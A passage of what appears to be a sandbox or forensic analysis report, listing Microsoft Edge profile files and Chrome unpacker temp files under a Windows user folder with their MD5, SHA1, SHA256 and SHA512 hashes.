| SHA256 | 43702bb34b575b5e155ee1e94646829d8149450d15451acd679831cf8f2a3a39 |
| SHA512 | 39ad375fe975b5cff56c8ff198b436951ec4b24c643b8ac2bfd03d5305609568642df6aa90e9c51b69a1c6ca14d079566ab2b0205913a62ab8c8ee2c6fcfc351 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 80f4e9422eac465d0cb839f9ec657423 |
| SHA1 | 7ae7c9c8f71b2246f9db900ba17983c6ff80391a |
| SHA256 | 6800149cdb9a1eb90c8a1a7c6172200916b9fca5eb5de94332d0c4fd1d91efce |
| SHA512 | 299f7abba36fb34736f498c16548628f6d416e2d204bcb694a0177385926e7dbb601346b4027ce8c68bc23f0999a1e79ee6a4a72a6f03f87ee4dc269633044e2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | 5d2f73605d83517489c415310935fdc2 |
| SHA1 | 610ead0f9385379542e95db3c19c0ce55f377816 |
| SHA256 | 5a3fd34853e2d06b33bfd480290be69bf4939a55e85a98212db753776f74a8f7 |
| SHA512 | 3155b64ff58483edf26b68d2a9f1d00e68335afba4be9f06c9778ef571e112c8434a271cf81d702f6cb728b98cdbc2572a415ce1ad540059be7f698ce446084f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | aa347df55fc4171b943c497ff3d96c45 |
| SHA1 | 6ab2ecdfd5f5662200961923bd3175f4d73ce705 |
| SHA256 | b401e3e05c54ab29722a03038286d0289fee803c5d40332bf2972ebcf3d6272f |
| SHA512 | 34da03243ffd5b1861c6de7c0bafeec09dfc94a6b1893656ecac9d8986e214cc6770a7b7f7cf227ac10bdf049d4238a605425840a4b7b85edc7106b1bcf34e78 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig
| MD5 | 3f8927c365639daa9b2c270898e3cf9d |
| SHA1 | c8da31c97c56671c910d28010f754319f1d90fa6 |
| SHA256 | fc80d48a732def35ab6168d8fd957a6f13f3c912d7f9baf960c17249e4a9a1f2 |
| SHA512 | d75b93f30989428883cb5e76f6125b09f565414cf45d59053527db48c6cf2ac7f54ed9e8f6a713c855cd5d89531145592ef27048cf1c0f63d7434cfb669dbd72 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | 7dcd381e34f2d96bbb5d15c0ebf30820 |
| SHA1 | a2edb2501d83579d01535a2f6d014a8db412febb |
| SHA256 | 2957a70027cbc14b4c2bb30eb87a5572a9ead9a5636e4ee5c79bde3f5c7ea489 |
| SHA512 | a4fbb96b20e6d7f95a0cc1e51d70a4462dbcab3cdb5d278f2e908a310b4360ced730f45d77019c4fdd7d465e797a324aa2aa130ab8159ea58853e729683a3936 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 51ab801a780d1c380d2cd779e0a8f835 |
| SHA1 | b190f46826615d335c057a6fff8c5998bd181863 |
| SHA256 | b46780534730a8a2ad0532734720a881ee01cdf15fa689020b81e388f81afecb |
| SHA512 | 9aaa665365dd03efd8c1e5049ca772e99d2adc29a33801b982a6663ba37d0a4853e27bb02005dba168910c26a3ea3138bebab57abd2d8299ca250dba870b9ae0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | d84b2cb54a7644589e503354d11d5cf0 |
| SHA1 | 89d27492bff5d95e26c130d499c7561db6efb607 |
| SHA256 | 35561106b6cf77f20520ae0c81f48c0086f9206011fea30f414b073ddf4ca9f1 |
| SHA512 | bcfc53801297abff96674f04c5348a5e20cd3bf6c657a68ac2410b87c3b9f41a9e680532851423db4a7621b161ca9065f331abec22e93cfb47d3c600ad0827ba |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_229346093\manifest.json
| MD5 | c3419069a1c30140b77045aba38f12cf |
| SHA1 | 11920f0c1e55cadc7d2893d1eebb268b3459762a |
| SHA256 | db9a702209807ba039871e542e8356219f342a8d9c9ca34bcd9a86727f4a3a0f |
| SHA512 | c5e95a4e9f5919cb14f4127539c4353a55c5f68062bf6f95e1843b6690cebed3c93170badb2412b7fb9f109a620385b0ae74783227d6813f26ff8c29074758a1 |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_229346093\LICENSE
| MD5 | ee002cb9e51bb8dfa89640a406a1090a |
| SHA1 | 49ee3ad535947d8821ffdeb67ffc9bc37d1ebbb2 |
| SHA256 | 3dbd2c90050b652d63656481c3e5871c52261575292db77d4ea63419f187a55b |
| SHA512 | d1fdcc436b8ca8c68d4dc7077f84f803a535bf2ce31d9eb5d0c466b62d6567b2c59974995060403ed757e92245db07e70c6bddbf1c3519fed300cc5b9bf9177c |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_1442292907\manifest.json
| MD5 | 6607494855f7b5c0348eecd49ef7ce46 |
| SHA1 | 2c844dd9ea648efec08776757bc376b5a6f9eb71 |
| SHA256 | 37c30639ea04878b9407aecbcea4848b033e4548d5023ce5105ea79cab2c68dd |
| SHA512 | 8cb60725d958291b9a78c293992768cb03ff53ab942637e62eb6f17d80e0864c56a9c8ccafbc28246e9ce1fdb248e8d071d76764bcaf0243397d0f0a62b4d09a |
C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping2600_1862864033\manifest.json
| MD5 | 78b473ee6bb38cbb39886624887efe63 |
| SHA1 | d40fe3eba931ed08c8a68907ba20773a9987b3ce |
| SHA256 | 3a4a45d0995fcb759016fd1d875e1fc913a14236e8f7d3ae31930ee3f0477329 |
| SHA512 | 92d03db5c60d0a805c896865e245e25ca43675677237e2dc38e82336cd3ac239e0dd878046d5bbfa50ec3206392857ac3305d64da6d1605e22b76a4f3e69ad18 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Typosquatting\2025.4.20.1\typosquatting_list.pb
| MD5 | 488a70b7d4621e059e32d395221223aa |
| SHA1 | 774b5a2124f5c3d8d210020dc53e5033b04a5f76 |
| SHA256 | 8c87afec8dba2f1a072c3fbecc7fa8fb81e93a64639bf9c00e24b4bb712b57a6 |
| SHA512 | bab1b4716e5faf0054cc93a969d1a79e6ee9d11d054d102afa0ba564142f444cbe9508aa013f118b701e4ca5283b0ef5a3a4859a67709a441bcbb8b25e78ca09 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b4d07136863f6cf396ac2f1ca0e506cc |
| SHA1 | 841cbc9810493a3445683408eb9103e428c32c5d |
| SHA256 | efbf229a4e0825eed4efb25633d917cf23b11f45aab7b71f8e9dfd0f05b0b512 |
| SHA512 | 5fc3c0a58c6aef042bd014ae2fbedfaad102bc827b5aed353682ec3dbec36ff47a69b9a9fa4173ab4568373e2dab6866baaaf2275ed94e28ca46ad770e41444e |